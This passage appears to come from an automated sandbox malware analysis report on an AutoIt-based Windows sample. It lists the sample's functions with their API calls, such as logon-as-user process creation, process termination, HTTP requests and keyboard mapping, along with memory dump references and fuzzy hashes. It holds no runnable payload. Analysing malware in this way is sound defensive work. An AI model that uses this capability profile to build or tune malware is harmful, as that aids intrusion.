              • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 001D8B2A
              • OpenProcessToken.ADVAPI32(00000000), ref: 001D8B31
              • CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 001D8B40
              • CloseHandle.KERNEL32(00000004), ref: 001D8B4B
              • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 001D8B7A
              • DestroyEnvironmentBlock.USERENV(00000000), ref: 001D8B8E
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
              • String ID:
              • API String ID: 1413079979-0
              • Opcode ID: 1f019029abb120cbab6de34773fa4f73ef58e7ec2f50f1aa0c6aa1d9413c0f67
              • Instruction ID: f85ecb5a02c6078a05369c3420718fdc46aad5b7ed0c1226cfdc8c2a78088ebb
              • Opcode Fuzzy Hash: 1f019029abb120cbab6de34773fa4f73ef58e7ec2f50f1aa0c6aa1d9413c0f67
              • Instruction Fuzzy Hash: 19116AB254020DAFDF118FA4ED49FDE7BA9EF08704F044166FE04A2161C7769D60EB61
              Function 0020C19A Relevance: 9.0, APIs: 6, Instructions: 49COMMON
              Download Yara Rule
              APIs
                • Part of subcall function 001812F3: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 0018134D
                • Part of subcall function 001812F3: SelectObject.GDI32(?,00000000), ref: 0018135C
                • Part of subcall function 001812F3: BeginPath.GDI32(?), ref: 00181373
                • Part of subcall function 001812F3: SelectObject.GDI32(?,00000000), ref: 0018139C
              • MoveToEx.GDI32(00000000,-00000002,?,00000000), ref: 0020C1C4
              • LineTo.GDI32(00000000,00000003,?), ref: 0020C1D8
              • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 0020C1E6
              • LineTo.GDI32(00000000,00000000,?), ref: 0020C1F6
              • EndPath.GDI32(00000000), ref: 0020C206
              • StrokePath.GDI32(00000000), ref: 0020C216
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: Path$LineMoveObjectSelect$BeginCreateStroke
              • String ID:
              • API String ID: 43455801-0
              • Opcode ID: 12c569bc2115af65d972e244146a895121d54133c3e869bb085d3a172405966a
              • Instruction ID: 63036a9d1e7d76febccde845e7d0c56ffe664eb9b496bceaf65a56a8cec50ab4
              • Opcode Fuzzy Hash: 12c569bc2115af65d972e244146a895121d54133c3e869bb085d3a172405966a
              • Instruction Fuzzy Hash: 84111B7644020DBFDF119F90EC88FAA7FADEB19354F048021BE185A5A2C7719E59DBA0
              Function 001A03A2 Relevance: 9.0, APIs: 6, Instructions: 44keyboardCOMMON
              Download Yara Rule
              APIs
              • MapVirtualKeyW.USER32(0000005B,00000000), ref: 001A03D3
              • MapVirtualKeyW.USER32(00000010,00000000), ref: 001A03DB
              • MapVirtualKeyW.USER32(000000A0,00000000), ref: 001A03E6
              • MapVirtualKeyW.USER32(000000A1,00000000), ref: 001A03F1
              • MapVirtualKeyW.USER32(00000011,00000000), ref: 001A03F9
              • MapVirtualKeyW.USER32(00000012,00000000), ref: 001A0401
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: Virtual
              • String ID:
              • API String ID: 4278518827-0
              • Opcode ID: df89cc157cbdd1c200528a9c2cb662166effacd5244c94e04a288095790e1bad
              • Instruction ID: f151f029ee5215b9018eef831500f7cbe61ba8e3a83edd18bd9c24321523ad57
              • Opcode Fuzzy Hash: df89cc157cbdd1c200528a9c2cb662166effacd5244c94e04a288095790e1bad
              • Instruction Fuzzy Hash: EA016CB09417597DE3008F5A8C85B52FFA8FF19354F00411BA15C47942C7F5A864CFE5
              Function 001E568B Relevance: 9.0, APIs: 6, Instructions: 43windowtimethreadCOMMON
              Download Yara Rule
              APIs
              • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 001E569B
              • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 001E56B1
              • GetWindowThreadProcessId.USER32(?,?), ref: 001E56C0
              • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 001E56CF
              • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 001E56D9
              • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 001E56E0
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
              • String ID:
              • API String ID: 839392675-0
              • Opcode ID: 48a8415b35a77aacd529ca45a7da89f7b3fed3679c984f72a826d0004f363168
              • Instruction ID: 4241f761a4938388fa2cb08c758eb0f2be73e3be545bea751fee64867d8ce044
              • Opcode Fuzzy Hash: 48a8415b35a77aacd529ca45a7da89f7b3fed3679c984f72a826d0004f363168
              • Instruction Fuzzy Hash: FCF09032281258BBE3305BA2ED0DEEF7B7CEFCAB11F000169FA04D1052DBA11A0186B5
              Function 001E74D2 Relevance: 9.0, APIs: 6, Instructions: 33synchronizationthreadCOMMONLIBRARYCODE
              Download Yara Rule
              APIs
              • InterlockedExchange.KERNEL32(?,?), ref: 001E74E5
              • EnterCriticalSection.KERNEL32(?,?,00191044,?,?), ref: 001E74F6
              • TerminateThread.KERNEL32(00000000,000001F6,?,00191044,?,?), ref: 001E7503
              • WaitForSingleObject.KERNEL32(00000000,000003E8,?,00191044,?,?), ref: 001E7510
                • Part of subcall function 001E6ED7: CloseHandle.KERNEL32(00000000,?,001E751D,?,00191044,?,?), ref: 001E6EE1
              • InterlockedExchange.KERNEL32(?,000001F6), ref: 001E7523
              • LeaveCriticalSection.KERNEL32(?,?,00191044,?,?), ref: 001E752A
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
              • String ID:
              • API String ID: 3495660284-0
              • Opcode ID: 07239221868e2581b2d0834b527bdc89bb67fb54cf0ee9c8b1ddf8a0a6b07709
              • Instruction ID: 849179481085fb9ea4d72669e7b37ff05f74edcd35649ba95f4d25aa25c27b7b
              • Opcode Fuzzy Hash: 07239221868e2581b2d0834b527bdc89bb67fb54cf0ee9c8b1ddf8a0a6b07709
              • Instruction Fuzzy Hash: 72F0543A180712EFE7616B64FE4C9DF7729EF45302F000531F502914B6CB755801CB50
              Function 001D8E74 Relevance: 9.0, APIs: 6, Instructions: 23memorysynchronizationCOMMON
              Download Yara Rule
              APIs
              • WaitForSingleObject.KERNEL32(?,000000FF), ref: 001D8E7F
              • UnloadUserProfile.USERENV(?,?), ref: 001D8E8B
              • CloseHandle.KERNEL32(?), ref: 001D8E94
              • CloseHandle.KERNEL32(?), ref: 001D8E9C
              • GetProcessHeap.KERNEL32(00000000,?), ref: 001D8EA5
              • HeapFree.KERNEL32(00000000), ref: 001D8EAC
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
              • String ID:
              • API String ID: 146765662-0
              • Opcode ID: 6fc10c4ab5bbe979cc175007bbfec08c42580857f694b17781b6a768b22fa165
              • Instruction ID: 2d433bd2b497b59436208efc3ee6050957629c98176ca43449e390c8d4e0c459
              • Opcode Fuzzy Hash: 6fc10c4ab5bbe979cc175007bbfec08c42580857f694b17781b6a768b22fa165
              • Instruction Fuzzy Hash: 54E0C236084201FBDA515FE1FE0C90AFB79FB89722B108230F21981871CB329460DB90
              Function 001D7A78 Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 231COMMON
              Download Yara Rule
              APIs
              • ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,00212C7C,?), ref: 001D7C32
              • CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,00212C7C,?), ref: 001D7C4A
              • CLSIDFromProgID.OLE32(?,?,00000000,0020FB80,000000FF,?,00000000,00000800,00000000,?,00212C7C,?), ref: 001D7C6F
              • _memcmp.LIBCMT ref: 001D7C90
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: FromProg$FreeTask_memcmp
              • String ID: ,,!
              • API String ID: 314563124-3142458726
              • Opcode ID: 25cca3e58526fd7cc3a4a2ee04a99778e706abaad8ab4e3452cd7a72b828cc0b
              • Instruction ID: 4965d374a956318e8997f17eab713dabf9e91fd484aa0ea93174570eb4026ecd
              • Opcode Fuzzy Hash: 25cca3e58526fd7cc3a4a2ee04a99778e706abaad8ab4e3452cd7a72b828cc0b
              • Instruction Fuzzy Hash: 6F812C75A00109EFCB04DF94C984DEEB7B9FF89315F204599F506AB290EB71AE06CB60
              Function 001F8902 Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 225COMMON
              Download Yara Rule
              APIs
              • VariantInit.OLEAUT32(?), ref: 001F8928
              • CharUpperBuffW.USER32(?,?), ref: 001F8A37
              • VariantClear.OLEAUT32(?), ref: 001F8BAF
                • Part of subcall function 001E7804: VariantInit.OLEAUT32(00000000), ref: 001E7844
                • Part of subcall function 001E7804: VariantCopy.OLEAUT32(00000000,?), ref: 001E784D
                • Part of subcall function 001E7804: VariantClear.OLEAUT32(00000000), ref: 001E7859
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: Variant$ClearInit$BuffCharCopyUpper
              • String ID: AUTOIT.ERROR$Incorrect Parameter format
              • API String ID: 4237274167-1221869570
              • Opcode ID: a4a300036e5842e1e482cc0f21843efe40b81ecfb297ce3fa427804637cd4832
              • Instruction ID: 92d9764e8b2b8246b1afcf21a820d0a0f8f641c69adaf24b91985a2a65169166
              • Opcode Fuzzy Hash: a4a300036e5842e1e482cc0f21843efe40b81ecfb297ce3fa427804637cd4832
              • Instruction Fuzzy Hash: 39919B756083059FC714EF24C48496ABBF4FF99314F04896EF99A8B362DB30E906CB52
              Function 001E2F86 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 195windowCOMMON
              Download Yara Rule
              APIs
                • Part of subcall function 0019FEC6: _wcscpy.LIBCMT ref: 0019FEE9
              • _memset.LIBCMT ref: 001E3077
              • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 001E30A6
              • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 001E3159
              • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 001E3187
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: ItemMenu$Info$Default_memset_wcscpy
              • String ID: 0
              • API String ID: 4152858687-4108050209
              • Opcode ID: 7643e62cf9ea92ba111c5934c0e95d5520116aab2e1a949f3fe0121f1708a92a
              • Instruction ID: 89b7ee1b1fa9071927f62b55425226055d88c4df358e2690d9a72b40985ce0b2
              • Opcode Fuzzy Hash: 7643e62cf9ea92ba111c5934c0e95d5520116aab2e1a949f3fe0121f1708a92a
              • Instruction Fuzzy Hash: 035104316087809FD7299F29D84DA6FBBE8EF55760F04092DF8A5D3191DB70CE448B52
              Function 001E2C42 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 114windowCOMMON
              Download Yara Rule
              APIs
              • _memset.LIBCMT ref: 001E2CAF
              • GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 001E2CCB
              • DeleteMenu.USER32(?,00000007,00000000), ref: 001E2D11
              • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,00246890,00000000), ref: 001E2D5A
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: Menu$Delete$InfoItem_memset
              • String ID: 0
              • API String ID: 1173514356-4108050209
              • Opcode ID: e9fc50e657f473ce7f677776f620a9b2c2a9ef256b67b4a685b1b763f556f6b1
              • Instruction ID: ee4b6e8ca1f823744be5e4fd3ba02c0e42b736b8b9380e33d6c6f2217857c026
              • Opcode Fuzzy Hash: e9fc50e657f473ce7f677776f620a9b2c2a9ef256b67b4a685b1b763f556f6b1
              • Instruction Fuzzy Hash: 6541AC302047829FD724DF65DC54B5EBBE8BF85320F14462DFA65972A1D770E904CB92
              Function 001FDAB9 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 101COMMON
              Download Yara Rule
              APIs
              • CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 001FDAD9
                • Part of subcall function 001879AB: _memmove.LIBCMT ref: 001879F9
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: BuffCharLower_memmove
              • String ID: cdecl$none$stdcall$winapi
              • API String ID: 3425801089-567219261
              • Opcode ID: 537baabac9bc3fe78c401b5a96ce5053eb73f9c83a395b7605b85c4a4dcdbf94
              • Instruction ID: b685207e91926257a635d92e07caa632e26966b72c49fe16fb0297ccd69c318b
              • Opcode Fuzzy Hash: 537baabac9bc3fe78c401b5a96ce5053eb73f9c83a395b7605b85c4a4dcdbf94
              • Instruction Fuzzy Hash: E831D275500619AFCF04EF94CC818BEB3B5FF16320B108629E925976D1CB31EA06CB80
              Function 001D9372 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 94windowCOMMON
              Download Yara Rule
              APIs
                • Part of subcall function 00187F41: _memmove.LIBCMT ref: 00187F82
                • Part of subcall function 001DB0C4: GetClassNameW.USER32(?,?,000000FF), ref: 001DB0E7
              • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 001D93F6
              • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 001D9409
              • SendMessageW.USER32(?,00000189,?,00000000), ref: 001D9439
                • Part of subcall function 00187D2C: _memmove.LIBCMT ref: 00187D66
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: MessageSend$_memmove$ClassName
              • String ID: ComboBox$ListBox
              • API String ID: 365058703-1403004172
              • Opcode ID: 3558fef939ab62800a2ff70f4938e5a90d2475bd6089a71bb7e520a30a03e9ff
              • Instruction ID: e24f7d5e0d791d2a56b31ccc282ee7bb5e96c514b62d2a73671435aa11f0076d
              • Opcode Fuzzy Hash: 3558fef939ab62800a2ff70f4938e5a90d2475bd6089a71bb7e520a30a03e9ff
              • Instruction Fuzzy Hash: B8212671940204BFDB18ABB0DC85CFFB77CEF16360B10421AF921972E2DB355A4A8A60
              Function 001F1B21 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 86networkCOMMON
              Download Yara Rule
              APIs
              • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 001F1B40
              • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 001F1B66
              • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 001F1B96
              • InternetCloseHandle.WININET(00000000), ref: 001F1BDD
                • Part of subcall function 001F2777: GetLastError.KERNEL32(?,?,001F1B0B,00000000,00000000,00000001), ref: 001F278C
                • Part of subcall function 001F2777: SetEvent.KERNEL32(?,?,001F1B0B,00000000,00000000,00000001), ref: 001F27A1
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
              • String ID:
              • API String ID: 3113390036-3916222277
              • Opcode ID: 7f81b9e0416e5fce2046587aa7df41116954b34b14ee5dd2d92ae219fc785842
              • Instruction ID: 88ce93d34ea9bc973fb6f61eca0f8c9a61f126ac6ba016b438f2fb9122c2a250
              • Opcode Fuzzy Hash: 7f81b9e0416e5fce2046587aa7df41116954b34b14ee5dd2d92ae219fc785842
              • Instruction Fuzzy Hash: 3221BEB154020CFFEB219F609C89EBB77FCEB99744F10412AF605A2650EB309D059762
              Function 00206656 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 80windowlibraryCOMMON
              Download Yara Rule
              APIs
                • Part of subcall function 00181D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00181D73
                • Part of subcall function 00181D35: GetStockObject.GDI32(00000011), ref: 00181D87
                • Part of subcall function 00181D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00181D91
              • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 002066D0
              • LoadLibraryW.KERNEL32(?), ref: 002066D7
              • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 002066EC
              • DestroyWindow.USER32(?), ref: 002066F4
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
              • String ID: SysAnimate32
              • API String ID: 4146253029-1011021900
              • Opcode ID: 4f3bda09725446add3ab46d9b42aa5240aa90f0388deb2e482df1f0e07b44a1e
              • Instruction ID: 35810085a786cf4944b2855cb37ac408f96d8dee6ab39cdd60669964222bfc42
              • Opcode Fuzzy Hash: 4f3bda09725446add3ab46d9b42aa5240aa90f0388deb2e482df1f0e07b44a1e
              • Instruction Fuzzy Hash: 1E218B71220306AFEF104F64EC88EAB77ADEB59368F104629F911921E2D7768C719B60
              Function 001E703E Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79filepipeCOMMON
              Download Yara Rule
              APIs
              • GetStdHandle.KERNEL32(0000000C), ref: 001E705E
              • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 001E7091
              • GetStdHandle.KERNEL32(0000000C), ref: 001E70A3
              • CreateFileW.KERNEL32(nul,40000000,00000002,0000000C,00000003,00000080,00000000), ref: 001E70DD
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: CreateHandle$FilePipe
              • String ID: nul
              • API String ID: 4209266947-2873401336
              • Opcode ID: a42b29d77f5e81a92bf3da917a47950c103675fc6aea918456b1087cb59a0fec
              • Instruction ID: 2c5e8d31ac4e23a93d152631fd2cfe5a1e9ea693297a8eb350a8716874c63747
              • Opcode Fuzzy Hash: a42b29d77f5e81a92bf3da917a47950c103675fc6aea918456b1087cb59a0fec
              • Instruction Fuzzy Hash: 13218174504749ABEB209F3AEC09A9EB7B8AF56720F204A19FCA1D72D0D7B099508B50
              Function 001E710C Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79filepipeCOMMON
              Download Yara Rule
              APIs
              • GetStdHandle.KERNEL32(000000F6), ref: 001E712B
              • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 001E715D
              • GetStdHandle.KERNEL32(000000F6), ref: 001E716E
              • CreateFileW.KERNEL32(nul,80000000,00000001,0000000C,00000003,00000080,00000000), ref: 001E71A8
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmpDownload File
